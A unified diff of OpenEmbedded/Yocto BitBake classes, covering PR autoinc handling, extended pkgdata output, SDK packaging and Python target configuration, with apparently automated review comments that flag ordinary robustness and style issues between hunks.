--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
+ e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
e.data.setVar("MLPREFIX", variant + "-")
override = ":virtclass-multilib-" + variant
e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
d.setVar("LINGUAS_INSTALL", "")
# FIXME, we need to map this to something, not delete it!
d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
- bb.build.deltask('do_populate_sdk', d)
bb.build.deltask('do_populate_sdk_ext', d)
return
diff --git a/meta/classes/nativesdk.bbclass b/meta/classes/nativesdk.bbclass
index 7f2692c51a..dc5a9756b6 100644
--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
USE_NLS = "${SDKUSE_NLS}"
OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
+
+PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"
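Review bot: `PATH_prepend` puts `${COREBASE}/scripts/nativesdk-intercept` ahead of every other directory for all recipes inheriting nativesdk, so any executable placed there shadows the tool of the same name in every task. Nothing in the hunk says which commands are meant to be intercepted or why. A comment above the assignment, for example `# Wrappers in scripts/nativesdk-intercept override <commands> because <reason>` with the placeholders filled in, would make the scope of the override reviewable.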
diff --git a/meta/classes/npm.bbclass b/meta/classes/npm.bbclass
index 068032a1e5..bd01e247cd 100644
--- a/meta/classes/npm.bbclass
+++ b/meta/classes/npm.bbclass
@@ -17,8 +17,10 @@
# NPM_INSTALL_DEV:
# Set to 1 to also install devDependencies.
+inherit python3native
+
DEPENDS_prepend = "nodejs-native "
-RDEPENDS_${PN}_prepend = "nodejs "
+RDEPENDS_${PN}_append_class-target = " nodejs"
NPM_INSTALL_DEV ?= "0"
@@ -237,9 +239,7 @@ python npm_do_compile() {
sysroot = d.getVar("RECIPE_SYSROOT_NATIVE")
nodedir = os.path.join(sysroot, d.getVar("prefix_native").strip("/"))
configs.append(("nodedir", nodedir))
- bindir = os.path.join(sysroot, d.getVar("bindir_native").strip("/"))
- pythondir = os.path.join(bindir, "python-native", "python")
- configs.append(("python", pythondir))
+ configs.append(("python", d.getVar("PYTHON")))
# Add node-pre-gyp configuration
args.append(("target_arch", d.getVar("NPM_ARCH")))
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index cc64ddffc3..49d30caef7 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -7,7 +7,7 @@
#
# There are the following default steps but PACKAGEFUNCS can be extended:
#
-# a) package_get_auto_pr - get PRAUTO from remote PR service
+# a) package_convert_pr_autoinc - convert AUTOINC in PKGV to ${PRSERV_PV_AUTOINC}
#
# b) perform_packagecopy - Copy D into PKGD
#
@@ -585,12 +585,20 @@ def runtime_mapping_rename (varname, pkg, d):
#bb.note("%s after: %s" % (varname, d.getVar(varname)))
#
-# Package functions suitable for inclusion in PACKAGEFUNCS
+# Used by do_packagedata (and possibly other routines post do_package)
#
+package_get_auto_pr[vardepsexclude] = "BB_TASKDEPDATA"
python package_get_auto_pr() {
import oe.prservice
- import re
+
+ def get_do_package_hash(pn):
+ if d.getVar("BB_RUNTASK") != "do_package":
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ for dep in taskdepdata:
+ if taskdepdata[dep][1] == "do_package" and taskdepdata[dep][0] == pn:
+ return taskdepdata[dep][6]
+ return None
# Support per recipe PRSERV_HOST
pn = d.getVar('PN')
@@ -602,15 +610,22 @@ python package_get_auto_pr() {
# PR Server not active, handle AUTOINC
if not d.getVar('PRSERV_HOST'):
- if 'AUTOINC' in pkgv:
- d.setVar("PKGV", pkgv.replace("AUTOINC", "0"))
+ d.setVar("PRSERV_PV_AUTOINC", "0")
return
auto_pr = None
pv = d.getVar("PV")
version = d.getVar("PRAUTOINX")
pkgarch = d.getVar("PACKAGE_ARCH")
- checksum = d.getVar("BB_TASKHASH")
+ checksum = get_do_package_hash(pn)
+
+ # If do_package isn't in the dependencies, we can't get the checksum...
+ if not checksum:
+ bb.warn('Task %s requested do_package unihash, but it was not available.' % d.getVar('BB_RUNTASK'))
+ #taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ #for dep in taskdepdata:
+ # bb.warn('%s:%s = %s' % (taskdepdata[dep][0], taskdepdata[dep][1], taskdepdata[dep][6]))
+ return
if d.getVar('PRSERV_LOCKDOWN'):
auto_pr = d.getVar('PRAUTO_' + version + '_' + pkgarch) or d.getVar('PRAUTO_' + version) or None
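Review bot: The new `if not checksum:` branch only warns and returns, which leaves `PRAUTO` unset and, when a PR server is configured, leaves `PRSERV_PV_AUTOINC` unset as well. do_packagedata later runs packagedata_translate_pr_autoinc, which substitutes `${PRSERV_PV_AUTOINC}` and `${EXTENDPRAUTO}` into the pkgdata files, so this path may write unexpanded or empty version fields instead of stopping. Either fail here with `bb.fatal(...)` or set the same defaults the no-PR-server branch uses before returning. The three commented-out `taskdepdata` debug lines should be removed rather than committed. package_get_auto_pr continues outside this hunk.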
@@ -628,7 +643,7 @@ python package_get_auto_pr() {
srcpv = bb.fetch2.get_srcrev(d)
base_ver = "AUTOINC-%s" % version[:version.find(srcpv)]
value = conn.getPR(base_ver, pkgarch, srcpv)
- d.setVar("PKGV", pkgv.replace("AUTOINC", str(value)))
+ d.setVar("PRSERV_PV_AUTOINC", str(value))
auto_pr = conn.getPR(version, pkgarch, checksum)
except Exception as e:
@@ -638,6 +653,22 @@ python package_get_auto_pr() {
d.setVar('PRAUTO',str(auto_pr))
}
+#
+# Package functions suitable for inclusion in PACKAGEFUNCS
+#
+
+python package_convert_pr_autoinc() {
+ pkgv = d.getVar("PKGV")
+
+ # Adjust pkgv as necessary...
+ if 'AUTOINC' in pkgv:
+ d.setVar("PKGV", pkgv.replace("AUTOINC", "${PRSERV_PV_AUTOINC}"))
+
+ # Change PRSERV_PV_AUTOINC and EXTENDPRAUTO usage to special values
+ d.setVar('PRSERV_PV_AUTOINC', '@PRSERV_PV_AUTOINC@')
+ d.setVar('EXTENDPRAUTO', '@EXTENDPRAUTO@')
+}
+
LOCALEBASEPN ??= "${PN}"
python package_do_split_locales() {
@@ -1109,6 +1140,14 @@ python split_and_strip_files () {
# Modified the file so clear the cache
cpath.updatecache(file)
+ def strip_pkgd_prefix(f):
+ nonlocal dvar
+
+ if f.startswith(dvar):
+ return f[len(dvar):]
+
+ return f
+
#
# First lets process debug splitting
#
@@ -1122,6 +1161,8 @@ python split_and_strip_files () {
for file in staticlibs:
results.append( (file,source_info(file, d)) )
+ d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
+
sources = set()
for r in results:
sources.update(r[1])
@@ -1429,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
python emit_pkgdata() {
from glob import glob
import json
+ import gzip
def process_postinst_on_target(pkg, mlprefix):
pkgval = d.getVar('PKG_%s' % pkg)
@@ -1501,6 +1543,8 @@ fi
with open(data_file, 'w') as fd:
fd.write("PACKAGES: %s\n" % packages)
+ pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
+
pn = d.getVar('PN')
global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
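Review bot: `pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []` falls back to a list, but the value is used as a mapping further down in emit_pkgdata (`pkgdebugsource[fpath]` and `del pkgdebugsource[fpath]`) and is stored as a dict in split_and_strip_files. The fallback works today only because `fpath in []` is always false. `pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or {}` keeps the type consistent. emit_pkgdata starts and ends outside this hunk.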
@@ -1520,17 +1564,32 @@ fi
pkgval = pkg
d.setVar('PKG_%s' % pkg, pkg)
+ extended_data = {
+ "files_info": {}
+ }
+
pkgdestpkg = os.path.join(pkgdest, pkg)
files = {}
+ files_extra = {}
total_size = 0
seen = set()
for f in pkgfiles[pkg]:
- relpth = os.path.relpath(f, pkgdestpkg)
+ fpath = os.sep + os.path.relpath(f, pkgdestpkg)
+
fstat = os.lstat(f)
- files[os.sep + relpth] = fstat.st_size
+ files[fpath] = fstat.st_size
+
+ extended_data["files_info"].setdefault(fpath, {})
+ extended_data["files_info"][fpath]['size'] = fstat.st_size
+
if fstat.st_ino not in seen:
seen.add(fstat.st_ino)
total_size += fstat.st_size
+
+ if fpath in pkgdebugsource:
+ extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
+ del pkgdebugsource[fpath]
+
d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1551,6 +1610,10 @@ fi
sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
+ subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
+ with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
+ json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
+
# Symlinks needed for rprovides lookup
rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
if rprov:
@@ -1581,7 +1644,8 @@ fi
write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
}
-emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides"
+emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
+emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
ldconfig_postinst_fragment() {
if [ x"$D" = "x" ]; then
@@ -1589,7 +1653,7 @@ if [ x"$D" = "x" ]; then
fi
}
-RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps"
+RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
# Collect perfile run-time dependency metadata
# Output:
@@ -1958,12 +2022,12 @@ python package_do_pkgconfig () {
for pkg in packages.split():
pkgconfig_provided[pkg] = []
pkgconfig_needed[pkg] = []
- for file in pkgfiles[pkg]:
+ for file in sorted(pkgfiles[pkg]):
m = pc_re.match(file)
if m:
pd = bb.data.init()
name = m.group(1)
- pkgconfig_provided[pkg].append(name)
+ pkgconfig_provided[pkg].append(os.path.basename(name))
if not os.access(file, os.R_OK):
continue
with open(file, 'r') as f:
@@ -1986,7 +2050,7 @@ python package_do_pkgconfig () {
pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
if pkgconfig_provided[pkg] != []:
with open(pkgs_file, 'w') as f:
- for p in pkgconfig_provided[pkg]:
+ for p in sorted(pkgconfig_provided[pkg]):
f.write('%s\n' % p)
# Go from least to most specific since the last one found wins
@@ -2225,7 +2289,7 @@ python do_package () {
# cache. This is useful if an item this class depends on changes in a
# way that the output of this class changes. rpmdeps is a good example
# as any change to rpmdeps requires this to be rerun.
- # PACKAGE_BBCLASS_VERSION = "2"
+ # PACKAGE_BBCLASS_VERSION = "4"
# Init cachedpath
global cpath
@@ -2251,7 +2315,7 @@ python do_package () {
package_qa_handle_error("var-undefined", msg, d)
return
- bb.build.exec_func("package_get_auto_pr", d)
+ bb.build.exec_func("package_convert_pr_autoinc", d)
###########################################################################
# Optimisations
@@ -2323,9 +2387,21 @@ addtask do_package_setscene
# Copy from PKGDESTWORK to tempdirectory as tempdirectory can be cleaned at both
# do_package_setscene and do_packagedata_setscene leading to races
python do_packagedata () {
+ bb.build.exec_func("package_get_auto_pr", d)
+
src = d.expand("${PKGDESTWORK}")
dest = d.expand("${WORKDIR}/pkgdata-pdata-input")
oe.path.copyhardlinktree(src, dest)
+
+ bb.build.exec_func("packagedata_translate_pr_autoinc", d)
+}
+do_packagedata[cleandirs] += "${WORKDIR}/pkgdata-pdata-input"
+
+# Translate the EXTENDPRAUTO and AUTOINC to the final values
+packagedata_translate_pr_autoinc() {
+ find ${WORKDIR}/pkgdata-pdata-input -type f | xargs --no-run-if-empty \
+ sed -e 's,@PRSERV_PV_AUTOINC@,${PRSERV_PV_AUTOINC},g' \
+ -e 's,@EXTENDPRAUTO@,${EXTENDPRAUTO},g' -i
}
addtask packagedata before do_build after do_package
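Review bot: packagedata_translate_pr_autoinc pipes newline-delimited `find` output into `xargs`, so a path containing whitespace or quotes is split or misparsed. `find ${WORKDIR}/pkgdata-pdata-input -type f -print0 | xargs -0 --no-run-if-empty \` avoids that. The two values are also pasted into the `sed` replacement unescaped, so a `,`, `&` or backslash in `${PRSERV_PV_AUTOINC}` or `${EXTENDPRAUTO}` would change the expression; that is worth a comment stating the expected character set. As written, the command also runs `sed -i` over every regular file under the directory, which appears to include the gzip-compressed `extended/*.json.gz` files this commit adds in emit_pkgdata.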
diff --git a/meta/classes/package_deb.bbclass b/meta/classes/package_deb.bbclass
index 790b26aef2..fa8c6c82ff 100644
--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[umask] = "022"
do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_deb after do_packagedata do_package
-
+EPOCHTASK ??= ""
+addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index c008559e4a..4927cfba00 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[umask] = "022"
do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_ipk after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"
diff --git a/meta/classes/package_pkgdata.bbclass b/meta/classes/package_pkgdata.bbclass
index 18b7ed62e0..a1ea8fc041 100644
--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
}
package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
-package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA"
+package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
diff --git a/meta/classes/package_rpm.bbclass b/meta/classes/package_rpm.bbclass
index 9145717f98..65587d228b 100644
--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,10 +678,12 @@ python do_package_rpm () {
cmd = cmd + " --define '_use_internal_dependency_generator 0'"
cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
cmd = cmd + " --define '_build_id_links none'"
- cmd = cmd + " --define '_binary_payload w6T.xzdio'"
- cmd = cmd + " --define '_source_payload w6T.xzdio'"
+ cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
+ cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
+ cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
cmd = cmd + " --define '_buildhost reproducible'"
+ cmd = cmd + " --define '__font_provides %{nil}'"
if perfiledeps:
cmd = cmd + " --define '__find_requires " + outdepends + "'"
cmd = cmd + " --define '__find_provides " + outprovides + "'"
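Review bot: The two new payload lines each evaluate `int(d.getVar("XZ_THREADS"))`, which fails with a bare TypeError if XZ_THREADS is unset and a ValueError if it is not a plain integer; whether a default is guaranteed is not visible in this hunk. Reading the value once into a local such as `xz_threads = d.getVar("XZ_THREADS")` and calling `bb.fatal` with the variable name when it is missing or non-numeric would give a usable error and remove the duplicated lookup. The integer conversion itself is worth keeping, since the result is spliced into a command string. The body of do_package_rpm starts and ends outside this hunk.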
@@ -741,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[umask] = "022"
do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_rpm after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
patchdir = parm["patchdir"]
if not os.path.isabs(patchdir):
patchdir = os.path.join(s, patchdir)
+ if not os.path.isdir(patchdir):
+ bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
+ (patchdir, parm["patchdir"], parm['patchname']))
else:
patchdir = s
@@ -147,12 +150,12 @@ python patch_do_patch() {
patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
except Exception as exc:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(exc))
+ bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
try:
resolver.Resolve()
except bb.BBHandledException as e:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(e))
+ bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
bb.utils.remove(process_tmpdir, True)
del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index 3e5b1359d6..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
SDK_ARCHIVE_TYPE ?= "tar.xz"
SDK_XZ_COMPRESSION_LEVEL ?= "-9"
SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
+SDK_ZIP_OPTIONS ?= "-y"
+
# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
python () {
@@ -58,7 +60,7 @@ python () {
d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
# SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
# recommand to cd into input dir first to avoid archive with buildpath
- d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
+ d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
else:
d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
-PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
+PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
SDK_DEPENDS += "nativesdk-glibc-locale"
# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,6 +180,8 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
+PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
+
fakeroot create_sdk_files() {
cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
@@ -256,7 +260,7 @@ fakeroot create_shar() {
rm -f ${T}/pre_install_command ${T}/post_install_command
- if [ ${SDK_RELOCATE_AFTER_INSTALL} -eq 1 ] ; then
+ if [ "${SDK_RELOCATE_AFTER_INSTALL}" = "1" ] ; then
cp ${TOOLCHAIN_SHAR_REL_TMPL} ${T}/post_install_command
fi
cat << "EOF" >> ${T}/pre_install_command
@@ -273,6 +277,7 @@ EOF
# substitute variables
sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
-e 's#@SDKPATH@#${SDKPATH}#g' \
+ -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -322,6 +327,13 @@ def sdk_variables(d):
do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
+python () {
+ variables = sdk_command_variables(d)
+ for var in variables:
+ if d.getVar(var, False):
+ d.setVarFlag(var, 'func', '1')
+}
+
do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
${TOOLCHAIN_SHAR_EXT_TMPL}:True"
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
f.write("%s %s %s\n" % (info[1], info[2], info[3]))
}
-SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
+SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
@@ -247,7 +247,9 @@ python copy_buildsystem () {
# Create a layer for new recipes / appends
bbpath = d.getVar('BBPATH')
- bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')])
+ env = os.environ.copy()
+ env['PYTHONDONTWRITEBYTECODE'] = '1'
+ bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
# Create bblayers.conf
bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
# Hide the config information from bitbake output (since it's fixed within the SDK)
f.write('BUILDCFG_HEADER = ""\n\n')
+ # Write METADATA_REVISION
+ # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
+ f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
+
f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
f.write('WITHIN_EXT_SDK = "1"\n\n')
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
# A bit of another hack, but we need this in the path only for devtool
# so put it at the end of $PATH.
- echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script
+ echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
diff --git a/meta/classes/pypi.bbclass b/meta/classes/pypi.bbclass
index 87b4c85fc0..c68367449a 100644
--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
+
+CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"
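Review bot: The new default `CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"` has no comment saying that the part before the colon is a vendor restriction. As far as I know the CVE checker treats `vendor:product` as a vendor filter, so a package whose advisories are filed under a different vendor name would report no CVEs rather than too many; that is a silent false negative. I would add a comment above the line such as `# Restricts CVE matching to vendor "python"; recipes whose NVD vendor differs must set CVE_PRODUCT themselves`. PyPI names and NVD product names can also differ in case or in `-` versus `_`, which is worth mentioning in the same comment.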
diff --git a/meta/classes/python3native.bbclass b/meta/classes/python3native.bbclass
index d98fb4c758..2e3a88c126 100644
--- a/meta/classes/python3native.bbclass
+++ b/meta/classes/python3native.bbclass
@@ -17,8 +17,6 @@ export STAGING_LIBDIR
export PYTHON_LIBRARY="${STAGING_LIBDIR}/lib${PYTHON_DIR}${PYTHON_ABI}.so"
export PYTHON_INCLUDE_DIR="${STAGING_INCDIR}/${PYTHON_DIR}${PYTHON_ABI}"
-export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
-
# suppress host user's site-packages dirs.
export PYTHONNOUSERSITE = "1"
diff --git a/meta/classes/python3targetconfig.bbclass b/meta/classes/python3targetconfig.bbclass
new file mode 100644
index 0000000000..a6e67f1bf8
--- /dev/null
+++ b/meta/classes/python3targetconfig.bbclass
@@ -0,0 +1,29 @@
+inherit python3native
+
+EXTRA_PYTHON_DEPENDS ?= ""
+EXTRA_PYTHON_DEPENDS_class-target = "python3"
+DEPENDS_append = " ${EXTRA_PYTHON_DEPENDS}"
+
+do_configure_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_configure:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
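Review bot: This new class mixes two override spellings: the class-target functions are written `do_configure_prepend_class-target` while the class-nativesdk ones are written `do_configure:prepend:class-nativesdk`. Unless the BitBake on this branch treats both forms as overrides (not visible here), one set would be parsed as an unrelated function name and never run, leaving `_PYTHON_SYSCONFIGDATA_NAME` unexported for that class. The neighbouring hunks use the underscore form (`PATH_prepend`, `SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext`), so I would write `do_configure_prepend_class-nativesdk() {` and likewise for compile and install. A header comment explaining why the export moved from python3native into per-task prepends would help the next reader.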
diff --git a/meta/classes/qemuboot.bbclass b/meta/classes/qemuboot.bbclass
index 648af09b6e..92ae69d9f2 100644
--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
# QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
#
